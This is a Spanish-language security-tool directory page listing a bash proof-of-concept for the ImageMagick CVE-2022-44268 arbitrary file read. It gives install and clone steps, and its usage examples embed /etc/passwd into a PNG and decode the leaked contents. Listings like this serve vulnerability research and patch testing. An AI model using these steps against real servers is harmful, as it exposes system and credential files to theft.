Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ImageMagick-CVE-2022-44268-PoC — Un script bash para explotar fácilmente la vulnerabilidad de lectura arbitraria de archivos de ImageMagick CVE-2022-44268 | Kitploit
Herramientas/GitHubGitHub/atici/imagemagick-cve-2022-44268-poc
Análisis de VulnerabilidadesExplotaciónExfiltración de DatosRecopilación de InformaciónPruebas de PenetraciónDesarrollo de Payloads
GitHubatici/imagemagick-cve-2022-44268-poc

ImageMagick-CVE-2022-44268-PoC

Un script bash para explotar fácilmente la vulnerabilidad de lectura arbitraria de archivos de ImageMagick CVE-2022-44268

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 20 díasAún no revisado

ImageMagick-CVE-2022-44268-PoC

Un script bash para explotar fácilmente la vulnerabilidad de lectura arbitraria de archivos de ImageMagick CVE-2022-44268

Versión de ImageMagick afectada

root@kitploit:~
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP(4.5)
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib

Paquetes necesarios a instalar

root@kitploit:~
sudo apt-get install imagemagick exiftool pngcrush exiv2 -y

Configuración

root@kitploit:~
git clone https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268.git
cd Exploit-for-ImageMagick-CVE-2022-44268
chmod 750 script.sh

Uso

root@kitploit:~
./script.sh -p [Ruta a leer] [Imagen PNG] [Salida[Opcional, si no se usa, el valor predeterminado es pngout.png]]
./script.sh -d [PNG]

Ejemplos
./script.sh -p /etc/passwd sample.png output.png
./script.sh -d pngout.png

Opciones
-h = Mostrar ayuda
-p = Añadir el exploit a una imagen PNG 
-d = Extraer y decodificar el archivo leído

Créditos

  • Informe original: https://www.metabaseq.com/imagemagick-zero-days/
  • PoC original: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC.git
  • Inspiración para este proyecto: https://github.com/Ashifcoder/CVE-2022-44268-automated-poc

Descargo de responsabilidad:

Todo el código proporcionado en este repositorio es solo para fines educativos/de investigación. Cualquier acción y/o actividad relacionada con el material contenido en este repositorio es responsabilidad exclusiva tuya. El mal uso del código en este repositorio puede dar lugar a cargos penales contra las personas en cuestión. El autor no será considerado responsable en caso de que se presenten cargos penales contra cualquier individuo que haga un mal uso del código en este repositorio para infringir la ley.

Descargar herramienta